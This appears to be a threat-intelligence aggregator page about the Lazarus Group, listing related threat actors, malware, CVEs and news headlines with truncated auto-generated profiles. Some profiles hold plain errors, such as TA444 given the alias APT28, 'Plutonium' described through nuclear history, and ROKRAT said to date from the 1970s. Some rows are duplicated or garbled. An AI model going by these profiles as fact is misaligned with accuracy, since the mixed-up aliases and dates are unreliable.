| ID | Votes | Profile Description |
|---|---|---|
| Labyrinth Chollima | 5 | Labyrinth Chollima, a threat actor linked to North Korea, has been involved in numerous malicious activities since 2009. Tracked by CrowdStrike and other cybersecurity organizations, Labyrinth Chollima is part of the Lazarus Group, known for stealthy attacks targeting various industries such as acad |
| Andariel | 5 | Andariel, a notorious threat actor associated with the Lazarus Group and linked to North Korea, is known for its malicious cyber activities. The group has been identified using DTrack malware and Maui ransomware, notably in mid-2022, and has developed a reputation for exploiting ActiveX objects. Res |
| Sinbad | 4 | Sinbad is a threat actor suspected to be operated by North Korean operatives, primarily for the purpose of laundering stolen cryptocurrency. According to Chainalysis, Sinbad processed $24 million in December and January, indicating its use as a new mixing service. However, it's effectiveness is yet |
| Tornado Cash | 4 | Tornado Cash, a known threat actor in the cybersecurity landscape, has been under the spotlight for its illicit activities. The group is associated with various malicious intents and actions, ranging from a single person to a private company or even part of a government entity. In recent times, it h |
| APT38 | 4 | APT38, also known as TA444, BlueNoroff, BlackAlicanto, Coperenicum, Sapphire Sleet, Stardust Chollima, and TraderTraitor, is a threat actor group suspected to be backed by the North Korean regime. The group has been active in operations across over 16 organizations in at least 11 countries, primaril |
| Operation Dreamjob | 3 | Operation DreamJob is a campaign attributed to the Lazarus group, a North Korea-aligned group infamous for its cyberespionage and financial theft activities. The campaign was first coined in a blog post by ClearSky in August 2020, where it described Lazarus' attempts to target defense and aerospace |
| Diamond Sleet | 3 | Diamond Sleet, a North Korea-linked Advanced Persistent Threat (APT), has been identified as a significant threat actor in the cybersecurity landscape. This group is known for its sophisticated supply chain attacks, specifically leveraging CyberLink software to execute their malicious activities. Th |
| ZINC | 3 | Zinc, also known as Diamond Sleet, is a North Korea-based threat actor group that has been actively involved in cyberattacks on global media, defense, and IT industries. Microsoft's Threat Intelligence Center has been tracking the group's activities, which have included weaponizing open-source softw |
| Tradertraitor | 3 | TraderTraitor, also known as Lazarus Group or APT38, is a threat actor attributed to the North Korean government. This group has been linked by the FBI to several recent cyberattacks on cryptocurrency platforms, with hundreds of millions of dollars in cryptocurrency stolen. The attacks share similar |
| Kimsuky | 3 | Kimsuky is a North Korea-linked advanced persistent threat (APT) group that conducts global cyber-attacks to gather intelligence for the North Korean government. The group has been identified as a significant threat actor, executing actions with malicious intent, and has recently targeted victims vi |
| Emerald Sleet | 2 | Emerald Sleet, a North Korea-affiliated advanced persistent threat (APT) group, has emerged as a significant cybersecurity concern. The group leverages OpenAI’s ChatGPT, the same technology that underpins Microsoft's Copilot, to enhance its malicious activities. These activities include spear-phishi |
| Apt43 | 2 | APT43, also known as Kimsuky, is a North Korean state-sponsored advanced persistent threat (APT) group that has been actively involved in cybercrime and espionage. The group has been implicated in a series of attacks exploiting vulnerabilities, which have drawn the attention of various cybersecurity |
| Stardust Chollima | 2 | Stardust Chollima is a recognized threat actor in the cybersecurity industry, primarily known for its malicious activities aimed at acquiring funds. This group has been linked to various high-profile cyber-attacks and fraudulent activities since 2015. Stardust Chollima has been associated with the f |
| temp.hermit | 2 | Temp.Hermit, also known as Lazarus Group or Hidden Cobra, is a threat actor group associated with North Korea's Reconnaissance General Bureau (RGB). The group has been operational since 2013 and is known for its cyberespionage activities targeting governments and sectors such as defense, telecommuni |
| TA444 | 2 | TA444, also known as BlueNoroff, APT28, Nickel Gladstone, Sapphire Sleet, Stardust Chollima, and other monikers, is a prolific North Korean state-backed threat actor known for its malicious cyber activities. The group has been continuously generating proprietary malware, distinguishing it from other |
| Sapphire Sleet | 2 | Sapphire Sleet is a threat actor, or malicious entity, that is linked to North Korea. This group has been identified as an Advanced Persistent Threat (APT), known for executing sophisticated and continuous cyberattacks. Sapphire Sleet has been particularly active in targeting IT job seekers through |
| Unc4736 | 2 | UNC4736, a threat actor suspected to have North Korean connections, has been implicated in a series of cybersecurity breaches. The group gained initial access to the 3CX environment when an employee downloaded a financial trading package named X_TRADER from Trading Technologies' website. Unbeknownst |
| HIDDEN COBRA | 2 | Hidden Cobra, also known as the Lazarus Group and Sapphire Sleet, is a North Korean cyberespionage group that has been active since at least 2009. The U.S. Government uses the term Hidden Cobra to refer to malicious cyber activities by the North Korean government, with the BeagleBoyz representing a |
| Sharpshooter | 1 | Sharpshooter is a threat actor that has been identified as a significant cybersecurity risk. The operation was initially discovered in December 2018, where it used a unique implant framework to infiltrate global defense and critical infrastructure sectors, including nuclear, defense, energy, and fin |
| Velvet Chollima | 1 | Velvet Chollima, also known as Kimsuky, APT43, Thallium, Black Banshee, and Emerald Sleet among other names, is a threat actor believed to be based in North Korea. The group has been active since 2012 and is linked to North Korea’s General Reconnaissance Bureau, the country's main military intellige |
| Guardians of Peace | 1 | The Guardians of Peace is a threat actor, a term used in cybersecurity to refer to entities that execute actions with malicious intent. This group is most notorious for its 2014 cyberattack on Sony Pictures, during which they disclosed confidential data including private details about employees and |
| Lilacsquid | 1 | LilacSquid is a threat actor that has been actively targeting organizations in the U.S., Europe, and Asia since at least 2021. This group utilizes various tactics, techniques, and procedures (TTPs) to execute their malicious activities, including the use of Secure Socket Funneling (SSF) to establish |
| Reconnaissance General Bureau Rgb | 1 | The Reconnaissance General Bureau (RGB) is a North Korean military intelligence agency identified as a threat actor responsible for various cyberattacks. RGB is associated with hacking groups known as the "Lazarus Group," "Bluenoroff," and "Andariel," which are recognized as agencies or controlled e |
| ID | Type | Votes | Profile Description |
|---|---|---|---|
| Quiterat | Unspecified | 4 | QuiteRAT is a new type of malware associated with the North Korea-linked Lazarus Group, known for their use of custom malware. Built using the Qt framework, QuiteRAT is smaller in size compared to MagicRAT, another malware linked to the group, due to its incorporation of fewer Qt libraries and lack |
| Magicrat | Unspecified | 4 | MagicRAT is a type of malware, first observed by Cisco Talos in 2022, that was used by the Lazarus Group to exploit vulnerabilities in publicly exposed VMWare Horizon platforms, primarily targeting energy companies worldwide. This malicious software, which can infiltrate systems through suspicious d |
| Kandykorn | Unspecified | 4 | KandyKorn is a new strain of malware that has recently been identified as an emerging threat to the technology sector, particularly targeting blockchain engineers. The malicious software, which is designed to infiltrate and damage computer systems, often enters undetected through suspicious download |
| WannaCry | Unspecified | 4 | WannaCry is a type of malware, specifically ransomware, that caused significant global disruption in 2017. It exploited Windows SMBv1 Remote Code Execution Vulnerabilities (CVE-2017-0144, CVE-2017-0145, CVE-2017-0143), which allowed it to spread rapidly and infect over 200,000 machines across more t |
| Dtrack | Unspecified | 3 | DTrack is a type of malware, or malicious software, known for its destructive capabilities. It can infiltrate systems through dubious downloads, emails, or websites and wreak havoc by stealing personal information, disrupting operations, or holding data hostage for ransom. Notably, DTrack was utiliz |
| Earlyrat | Unspecified | 3 | EarlyRat is a previously undocumented malware discovered by Kaspersky researchers in June. The North Korea-linked Advanced Persistent Threat (APT) group Andariel used EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. The malware was first noticed in one of the Log4j cases, |
| Lightlesscan | Unspecified | 3 | LightlessCan is a new and advanced malware, discovered by ESET, that has been added to North Korea's Lazarus group's arsenal. The malware is a successor to the group's flagship HTTP(S) Lazarus Remote Access Trojan (RAT) named BlindingCan. LightlessCan represents a significant advancement in maliciou |
| AppleJeus | Unspecified | 3 | AppleJeus is a notorious malware attributed to the North Korean APT Lazarus Group, designed primarily to steal cryptocurrency. This malicious software has been a key instrument in North Korea's financial theft operations, with threat groups pilfering $2.3 billion USD worth of crypto assets between M |
| Collectionrat | Unspecified | 3 | CollectionRAT is a newly identified malware, discovered by cybersecurity researchers who traced its origins through reused infrastructure components. This malicious software, short for Malware, is designed to exploit and damage computers or devices, often infiltrating systems via suspicious download |
| Spectralblur | Unspecified | 2 | SpectralBlur is a new form of malware that has emerged as a significant cybersecurity threat in 2024. It is characterized as a backdoor Trojan targeting macOS systems, allowing unauthorized access and control over infected devices. This malicious software is capable of exploiting and damaging the us |
| Inksquid | Unspecified | 1 | None |
| Badrat | Unspecified | 1 | None |
| Rustbucket | Unspecified | 1 | RustBucket is a malicious software (malware) campaign that was first uncovered in 2021 and attributed to BlueNoroff, a North Korea-linked Advanced Persistent Threat (APT) group. The malware is known for its ability to exploit and damage computer systems, often infiltrating through suspicious downloa |
| Gopuram | Unspecified | 1 | Gopuram is a malicious software or malware that infiltrates systems to exploit and cause damage. It has been known to infect systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt operations, or even hold |
| Ryuk | Unspecified | 1 | Ryuk is a sophisticated malware, specifically a ransomware variant, that has been extensively used by cybercriminal group ITG23. The group has been employing crypting techniques for several years to obfuscate their malware, with Ryuk often seen in tandem with other malicious software such as Trickbo |
| Shamoon | Unspecified | 1 | Shamoon is a malicious software (malware) known for its destructive capabilities, particularly in wiping out data from infected systems. It first gained notoriety in 2012 when it was used in an attack on Saudi Aramco, crippling approximately 30,000 systems at the company. The malware replaced the co |
| Duuzer | Unspecified | 1 | Duuzer is a malicious software (malware) known for its harmful capabilities designed to exploit and damage computers or devices. It was first used in 2015, primarily targeting South Korean organizations, particularly those in the manufacturing sector. The malware, compatible with both 32-bit and 64- |
| Rising Sun | Unspecified | 1 | Rising Sun is a malicious software (malware) that shares significant similarities with the Lazarus Group’s Duuzer implant. It uses source code from the Duuzer backdoor, a malware first used in a 2015 campaign that targeted South Korean organizations, primarily in manufacturing. The Rising Sun malwar |
| ThreatNeedle | Unspecified | 1 | ThreatNeedle is a malicious software (malware) that has been identified as a tool used by the notorious North Korean Advanced Persistent Threat (APT) group, Lazarus. This malware, designed to exploit and damage computer systems, can infiltrate systems through suspicious downloads, emails, or website |
| KONNI | Unspecified | 1 | Konni is a malware, short for malicious software, that poses a significant threat to computer systems and data. It's designed to infiltrate systems surreptitiously through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside a system, Konni can wreak havoc by stealin |
| Opencarrot | Unspecified | 1 | OpenCarrot is a malicious software (malware) that targets Windows operating systems, enabling unauthorized access and control over infected machines. Identified by IBM XForce, it has been linked to the activities of the Lazarus Group, a North Korean cyber threat operation known for its sophisticated |
| Hermit | Unspecified | 1 | Hermit is a malicious software (malware) linked to North Korea, also known as the "Hermit Kingdom" due to its isolationist policies. This malware, along with others like Pegasus and DevilsTongue, targeted Apple users leading to a wave of sophisticated attacks in July 2022. In response, Apple develop |
| TYPEFRAME | Unspecified | 1 | Typeframe is a notorious malware variant known for its damaging potential. It was designed to exploit and harm computers or devices by infiltrating systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt o |
| Olympic Destroyer | Unspecified | 1 | Olympic Destroyer is a notorious malware that was used to disrupt the 2018 Pyeongchang Winter Olympics. The cyberattack, attributed to the Sandworm group, significantly impacted the event's IT infrastructure, including broadcasting, ticketing, various Olympics websites, and Wi-Fi at the host stadium |
| BLINDINGCAN | Unspecified | 1 | BlindingCan, also known as AIRDRY or ZetaNile, is a multifaceted malware capable of extracting sensitive data from compromised hosts. The threat actor gained initial access to systems via spear-phishing attacks masquerading as recruiters for high-profile companies and deployed new malware dubbed "Li |
| Volgmer | Unspecified | 1 | Volgmer is a backdoor Trojan malware, designed to provide covert access to a compromised system. Developed by the Lazarus Group, it has been used as a conduit for serving backdoors to control infected systems. This malware has been observed in 32-bit form as either executables or dynamic-link librar |
| Green Lambert | Unspecified | 1 | Green Lambert is a family of malware tools that are closely related to Blue Lambert. It was discovered while looking for malware similar to Blue Lambert, and it is considered a lighter, more reliable, but older version of Blue Lambert. The Green Lambert family stands out as the only one where non-Wi |
| Objcshellz | Unspecified | 1 | ObjCShellz is a lightweight but advanced malware written in Objective-C, identified by researchers from Jamf Threat Labs in November 2023. This malicious software is designed to infiltrate macOS systems and enable remote execution of commands by attackers. It is characterized by its advanced obfusca |
| SapphireStealer | Unspecified | 1 | SapphireStealer is a malicious software, or malware, that has gained significant traction in the cybersecurity landscape. This open-source .NET-based information-stealing malware has been employed by various threat groups, with some even creating their own customized versions. The malware's capabili |
| Swiftloader | Unspecified | 1 | SwiftLoader is a sophisticated malware that functions as a PDF viewer to lure unsuspecting victims. It was initially used in the RustBucket campaign, where it served as a second-stage malware, infecting systems through seemingly innocent downloads such as documents sent to targets. Notably, SwiftLoa |
| Carbanak | Unspecified | 1 | Carbanak is a sophisticated type of malware, short for malicious software, that is designed to exploit and damage computer systems. It can infiltrate systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt |
| Fudmodule | Unspecified | 1 | FudModule is a sophisticated malware developed by the Lazarus cyber-criminal group, known for its exceptional stealth and advanced capabilities. The group exploited a vulnerability in Microsoft's system, tagged as CVE-2024-21338, to perform direct kernel object manipulation using an updated version |
| Cloudmensis | Unspecified | 1 | CloudMensis, a form of malware specifically designed to exploit macOS systems, was first brought to light by ESET in July 2022. The software infiltrates devices primarily through email attachments, causing significant security breaches once inside. Once installed, CloudMensis works diligently to ide |
| ID | Type | Votes | Profile Description |
|---|---|---|---|
| Bluenoroff | is related to | 4 | BlueNoroff, a threat actor closely associated with the notorious Lazarus Group, has been actively involved in malicious cyber activities primarily targeting financial institutions and cryptocurrency businesses. Known for its sophisticated attacks on banks, casinos, fintech companies, POST software, |
| Technical Reconnaissance Bureau | Unspecified | 4 | The Technical Reconnaissance Bureau (TRB), also known as the Fourteenth Bureau, is a North Korea-based threat actor that leads the Democratic People's Republic of Korea's (DPRK) development of offensive cyber tactics and tools. The TRB conducts mail inspection, telecommunications inspection and cont |
| APT37 | Unspecified | 3 | APT37, also known as ScarCruft, Reaper, or Group123, is a threat actor suspected to be linked to North Korea. It primarily targets South Korea but has also extended its activities to Japan, Vietnam, and the Middle East, focusing on various industry verticals such as chemicals, electronics, manufactu |
| Onyx Sleet | Unspecified | 3 | Onyx Sleet, a North Korean nation-state threat actor, has been identified as a significant cybersecurity risk by Microsoft. Operating under the Lazarus Group umbrella, Onyx Sleet primarily targets defense and IT services organizations in South Korea, the United States, and India. In October 2023, Mi |
| sinbad.io | Unspecified | 3 | Sinbad.io, a threat actor identified as a popular money-laundering outlet for state-sponsored crypto thieves, emerged as a significant player in the cybercrime landscape over the past few years. Following U.S. sanctions on Tornado Cash, a previously favored service by North Korean hackers to obfusca |
| Rgb | Unspecified | 2 | RGB, a threat actor with ties to North Korea, has been involved in a range of malicious cyber activities. The group was designated by the Office of Foreign Assets Control (OFAC) on January 2, 2015, under Executive Order 13687 for being a controlled entity of the North Korean government. In addition |
| Wicked Panda | Unspecified | 2 | Wicked Panda, also known as APT41, Double Dragon, and Bronze Atlas, is a state-sponsored threat actor originating from China. Recognized as one of the top cyber threats by the Department of Health and Human Services' Health Sector Cybersecurity Coordination Center, this group has been associated wit |
| Thallium | Unspecified | 2 | Thallium, also known as Kimsuky, Velvet Chollima, and APT43, is a North Korean state-sponsored threat actor or hacking group that has been active since 2012. Tracked by the Cybereason Nocturnus Team and other security researchers, this cyber espionage group is believed to operate on behalf of the No |
| APT41 | Unspecified | 2 | APT41, also known as Winnti, Wicked Panda, and Wicked Spider, is a sophisticated threat actor attributed to China. This group has been active since at least 2012, targeting organizations across 14 countries. The group is known for its extensive use of various code families and tools, with at least 4 |
| APT28 | Unspecified | 2 | APT28, also known as Fancy Bear, is a threat actor linked to Russia and has been involved in numerous cyber espionage campaigns. The group is notorious for its sophisticated tactics, techniques, and procedures (TTPs). Recently, NATO and the EU formally condemned APT28's activities, acknowledging the |
| Double Dragon | Unspecified | 2 | Double Dragon, also known as APT41, Winnti, or Barium, is a prominent Advanced Persistent Threat (APT) group believed to have originated from China. As a threat actor, Double Dragon represents a human entity with the intent to execute actions of a malicious nature. The group has been identified by t |
| ScarCruft | Unspecified | 2 | ScarCruft, also known as APT37, Inky Squid, RedEyes, Reaper, or Group123, is a North Korean threat actor group associated with malicious cyber activities. Their actions have been linked to the execution of targeted attacks against individual Android devices, as outlined in a VB2023 paper titled "Int |
| Reconnaissance General Bureau | Unspecified | 2 | The Reconnaissance General Bureau (RGB) is a North Korean intelligence agency responsible for clandestine operations abroad, including cyber activities. The RGB has been associated with several threat actors, including the BeagleBoyz, who have likely been active since at least 2014. Other groups lin |
| APT33 | Unspecified | 2 | APT33, an Iran-linked threat actor, has been identified as a significant cyber threat to the Defense Industrial Base sector. The group is known for its sophisticated and malicious activities, which primarily involve executing actions with harmful intent. APT33, like other threat actors, could be a s |
| Bl00dy | Unspecified | 1 | Bl00dy is a threat actor known for its malicious activities in the cyber world. The group, along with another threat actor called Black Basta, have recently been identified as exploiting bugs in ConnectWise ScreenConnect, a popular remote management tool. This exploitation has led to a significant i |
| APT10 | Unspecified | 1 | APT10, also known as the Menupass Team, is a threat actor believed to operate on behalf of the Chinese Ministry of State Security (MSS). The group has been active since 2009 and is suspected to be based in Tianjin, China, according to research by IntrusionTruth in 2018. APT10 has primarily targeted |
| Sandworm | Unspecified | 1 | Sandworm, a threat actor linked to Russia, has been implicated in numerous high-profile cyber attacks. This group's activities have primarily targeted Ukraine, compromising the country's critical infrastructure and telecommunications providers. The Sandworm group is known for its fileless attack met |
| NICKEL | Unspecified | 1 | Nickel is a notable threat actor, or malicious entity, that has been involved in significant cyber operations. Notably, Nickel targeted government organizations across Latin America and Europe, alongside other nation-state affiliated threat actors such as FIN6 and Emissary Panda. These groups focuse |
| NICKEL ACADEMY | Unspecified | 1 | Nickel Academy is a threat actor, known for its malicious campaigns. In November 2017, the North Korean cyber threat group, known as the Lazarus Group, launched a spearphishing campaign using a job opening for a CFO role at a European-based cryptocurrency company as bait. CTU researchers discovered |
| BeagleBoyz | Unspecified | 1 | The BeagleBoyz, also known as threat activity group 71 (TAG-71), is a significant cybersecurity threat actor with strong ties to the North Korean state-sponsored APT38. This group, recognized under various aliases such as Bluenoroff and Stardust Chollima, has been involved in extensive cyber operati |
| FIN7 | Unspecified | 1 | FIN7, a notorious threat actor group known for its malicious activities, has recently been identified as targeting a large U.S. carmaker with phishing attacks. This group, which has previously operated behind fake cybersecurity companies such as Combi Security and Bastion Secure to recruit security |
| Lapsus | Unspecified | 1 | Lapsus is a significant threat actor that has been active since its inception in early 2022. The group gained notoriety for its cyberattacks, including a high-profile breach of Nvidia, an American multinational technology company, in the same year. This attack led to the leak of thousands of passwor |
| APT34 | Unspecified | 1 | APT34, also known as OilRig, EUROPIUM, Hazel Sandstorm, and Crambus among other names, is a threat actor believed to be operating on behalf of the Iranian government. Operational since at least 2014, APT34 has been involved in long-term cyber espionage operations primarily focused on reconnaissance |
| APT36 | Unspecified | 1 | APT36, also known as Transparent Tribe and Earth Karkaddan, is a notorious threat actor believed to be based in Pakistan. The group has been involved in cyberespionage activities primarily targeting India, with a focus on government, military, defense, aerospace, and education sectors. Their campaig |
| OceanLotus | Unspecified | 1 | OceanLotus, also known as APT32, is a threat actor suspected to be linked with Vietnam. It primarily targets foreign companies involved in manufacturing, consumer products, consulting, and hospitality sectors that are investing or planning to invest in Vietnam. The group's recent activities indicate |
| Sidewinder | Unspecified | 1 | The Sidewinder threat actor group, also known as Rattlesnake, BabyElephant, APT Q4, APT Q39, Hardcore Nationalist, HN2, RAZOR Tiger, and GroupA21, is a significant cybersecurity concern with a history of malicious activities dating back to 2012. This report investigates a recent campaign by Sidewind |
| APT29 | Unspecified | 1 | APT29, also known as Cozy Bear, SVR group, BlueBravo, Nobelium, Midnight Blizzard, and The Dukes, is a threat actor linked to Russia. This group is notorious for its malicious activities in the cybersecurity realm, executing actions with harmful intent. It has been associated with several high-profi |
| Turla | Unspecified | 1 | Turla, also known as Pensive Ursa, is a sophisticated threat actor linked to Russia that has been active for many years. The group is known for its advanced cyber-espionage capabilities and has been associated with numerous high-profile breaches. According to the MITRE ATT&CK and MITRE Ingenuity dat |
| Evil Corp | Unspecified | 1 | Evil Corp, a threat actor group based in Russia, has been identified as a significant cybercrime entity responsible for the execution of malicious actions. The alleged leader of this group is Maksim Yakubets, who is notably associated with Dridex malware operations. The U.S. Treasury imposed sanctio |
| TEMP.Reaper | Unspecified | 1 | None |
| FIN12 | Unspecified | 1 | FIN12, also known as DEV-0237 and Pistachio Tempest, is a threat actor group notorious for its malicious cyber activities. Tracked by Microsoft, this group is primarily engaged in the distribution of Hive, Conti, and Ryuk ransomware. The group has been responsible for several high-profile ransomware |
| Ricochet Chollima | Unspecified | 1 | Ricochet Chollima, also known as Ruby Sleet or ScarCruft among other aliases, is a threat actor associated with the Democratic Peoples’ Republic of Korea (DPRK). Active in espionage operations since at least 2016, Ricochet Chollima has primarily targeted South Korean individuals and entities, focusi |
| Ruby Sleet | Unspecified | 1 | Ruby Sleet, also known as Ricochet Chollima and CERIUM, is a North Korean threat actor that has been actively targeting governmental and defense sectors across several countries. According to a Microsoft report, from November 2022 to January 2023, Ruby Sleet, in conjunction with another threat actor |
| Kryptonite Panda | Unspecified | 1 | Kryptonite Panda, also known as APT40, Bronze Mohawk, Periscope, Mudcarp, and GINGHAM TYPHOON among others, is a threat actor believed to be based in Haikou, Hainan Province, People's Republic of China. This threat group has been associated with an array of cyber-espionage operations targeting gover |
| OilRig | Unspecified | 1 | OilRig is a well-known threat actor in the cybersecurity landscape, notorious for its sophisticated attacks on various targets, including Middle Eastern telecommunications organizations and Israel's critical infrastructure sector. This entity has been linked to several high-profile campaigns such as |
| Inky Squid | Unspecified | 1 | None |
| Darkseoul | Unspecified | 1 | DarkSeoul, also known as Onyx Sleet, Plutonium, and Andariel, is a threat actor group believed to be associated with the 110th Research Center. This group has been active since at least 2013, when it launched the DarkSeoul campaign, resulting in significant damage to thousands of systems in the fina |
| Cryptocore | Unspecified | 1 | CryptoCore, also known as UNC1069, is a threat actor linked to the North Korea-associated Advanced Persistent Threat (APT) group, Sapphire Sleet. This group, alternatively referred to as APT38, BlueNoroff, CageyChameleon, and CryptoCore, operates as a subgroup of the notorious Lazarus APT group. The |
| Magicline4nx | Unspecified | 1 | Magicline4nx is a threat actor that has recently emerged as a significant cybersecurity concern. This entity, which could be an individual, a private company, or a part of a government organization, is responsible for executing actions with malicious intent. In the realm of cybersecurity, where nami |
| Plutonium | Unspecified | 1 | Plutonium, a threat actor with potentially global implications, has been involved in several critical incidents. The group's activities have been traced back to the 1960s when alleged Israeli scientists visited NUMEC, claiming to obtain plutonium-238 for non-nuclear projects. The lack of stringent r |
| Whois Team | Unspecified | 1 | None |
| Phosphorus | Unspecified | 1 | Phosphorus, also known as APT35 or Charming Kitten, is a notorious Iranian cyberespionage group linked to the Islamic Revolutionary Guard Corps (IRGC). This threat actor has been involved in a series of malicious activities, employing novel tactics and tools. A significant discovery was made by the |
| Volt Typhoon | Unspecified | 1 | Volt Typhoon, a threat actor linked to China, has been identified as a significant cyber threat with strong operational security. Known for their sophisticated Advanced Persistent Threat (APT) activities, this group has been associated with the KV-Botnet and has remained undetected within U.S. infra |
| Anunak | Unspecified | 1 | Anunak, also known as Carbanak or FIN7, is a prominent threat actor in the cybercrime landscape. The group emerged around 2013 and specializes in financial theft, primarily targeting Eastern European banks, U.S. and European point-of-sale systems, and other entities. The name "Carbanak" was coined b |
| Blender | Unspecified | 1 | Blender, a renowned threat actor known for its involvement in the cybersecurity landscape, has recently been under scrutiny due to its alleged role in facilitating illegal transactions. Last year, the US imposed sanctions on crypto mixers Tornado Cash and Blender, targeting them as part of a broader |
| Redeyes | Unspecified | 1 | RedEyes, also known as APT37, StarCruft, Reaper, or BadRAT, is a threat actor group known for its malicious cyber activities. This group recently deployed a new malware named FadeStealer to extract information from targeted systems. They have also been observed using CloudMensis, a malware that seek |
| Reaper | Unspecified | 1 | Reaper, also known as APT37, Inky Squid, RedEyes, or ScarCruft, is a threat actor group attributed to North Korea. It deploys ROKRAT, a malicious tool that has been used in cyber exploitation since the 1970s. This group is also tied to the NOKKI malware family, which originated from research surroun |
| ID | Type | Votes | Profile Description |
|---|---|---|---|
| Log4Shell | Unspecified | 4 | Log4Shell is a software vulnerability, specifically a flaw in the design or implementation of the popular Java logging library, Log4j. Identified as CVE-2021-44228, this vulnerability allows an attacker to remotely execute arbitrary code, often leading to full system compromise. Advanced Persistent |
| CVE-2023-42793 | Unspecified | 3 | CVE-2023-42793 is a critical security vulnerability identified in JetBrains TeamCity build management and continuous integration server. This flaw, characterized by an authentication bypass, was exploited by multiple threat actors throughout 2023 and into 2024. The first notable exploitation occurre |
| CVE-2023-29059 | Unspecified | 1 | None |
| Lazarus Group the Lazarus Group | Unspecified | 1 | None |
| Quiterat Quiterat | Unspecified | 1 | None |
| Heartbleed | Unspecified | 1 | Heartbleed is a significant vulnerability (CVE-2014-0160) that was identified in the OpenSSL cryptographic software library in 2014. This flaw allows an attacker to read server memory and send additional data, leading to potential information leaks – hence the term "bleeding out data". The vulnerabi |
| CVE-2022-47966 | Unspecified | 1 | CVE-2022-47966 is a critical vulnerability discovered in Zoho ManageEngine ServiceDesk Plus, a widely used IT management software. The flaw was exploited by malicious actors to gain unauthorized access to the organization's systems and networks. The exploitation started just five days after proof-of |
| CVE-2022-26134 | Unspecified | 1 | CVE-2022-26134 is a critical software vulnerability that was discovered in Atlassian Confluence Server and Data Center. This flaw, which allows for remote code execution (RCE), was publicly disclosed by Atlassian in June 2022. The Cybersecurity and Infrastructure Security Agency (CISA) recognized th |
| Eternalblue | Unspecified | 1 | EternalBlue is a significant software vulnerability that exists in the design or implementation of certain systems. This flaw has been exploited by various cyber threats, with one notable instance being its use as an enabler for the widespread WannaCry ransomware attack. The exploit allows attackers |
| CVE-2021-44228 | Unspecified | 1 | CVE-2021-44228, also known as the Log4j vulnerability, is a software flaw found in Apache Log4j, a widely used logging utility. Despite multiple attempts by Advanced Persistent Threat (APT) actors to exploit this vulnerability in the ServiceDesk system, these efforts were unsuccessful. However, it b |
| CVE-2024-21338 | Unspecified | 1 | None |
| Source | CreatedAt | Title |
|---|---|---|
| BankInfoSecurity | 8 days ago | Cryptohack Roundup: $230M WazirX Exploit in India |
| DARKReading | 22 days ago | Euro 2024 Becomes Latest Sporting Event to Attract Cyberattacks |
| BankInfoSecurity | a month ago | Cryptohack Roundup: Conviction in Home Invasions Case |
| BankInfoSecurity | a month ago | Cryptohack Roundup: Norway Freezes Hacked Ronin Funds |
| DARKReading | 2 months ago | Russia Aims Cyber Operations at Summer Olympics |
| DARKReading | 2 months ago | LilacSquid APT Employs Open Source Tools, QuasarRAT |
| BankInfoSecurity | 2 months ago | RedTail Cryptomining Malware Exploits PAN-OS Vulnerability |
| BankInfoSecurity | 2 months ago | Microsoft Warns of North Korea's 'Moonstone Sleet' |
| Fortinet | 3 months ago | Key Findings from the 2H 2023 FortiGuard Labs Threat Report | FortiGuard Labs |
| BankInfoSecurity | 3 months ago | Cryptohack Roundup: Geosyn Fraud Lawsuit |
| DARKReading | 3 months ago | 3 DPRK APTs Spied on South Korea Defense Industry |
| BankInfoSecurity | 3 months ago | Cryptohack Roundup: First Conviction in Smart Contract Hack |
| DARKReading | 3 months ago | DPRK Exploits 2 MITRE Sub-Techniques: Phantom DLL Hijacking, TCC Abuse |
| DARKReading | 3 months ago | DPRK Exploits 2 MITRE Sub-Techniques: Phantom DLL Hijacking, TCC Abuse |
| CERT-EU | 4 months ago | Remilia Founder Claims Hacking Amid Ether and NFT Transfers | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #hacker | National Cyber Security Consulting |
| CERT-EU | 4 months ago | North Korean hackers are laundering millions worth of crypto through a sanctioned 'mixer' |
| CERT-EU | 4 months ago | Hackers like Lazarus continue to use Tornado Cash despite US sanctions | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #hacker | National Cyber Security Consulting |
| CERT-EU | 4 months ago | Lazarus Group taps Tornado Cash to launder Heco Bridge, HTX hack proceeds | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #hacker | National Cyber Security Consulting |
| CERT-EU | 4 months ago | North Korean Hackers Used Tornado Cash to Launder $12M From Heco Bridge Hack: Elliptic | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #hacker | National Cyber Security Consulting |
| DARKReading | 4 months ago | 150K+ UAE Network Devices & Apps Exposed Online |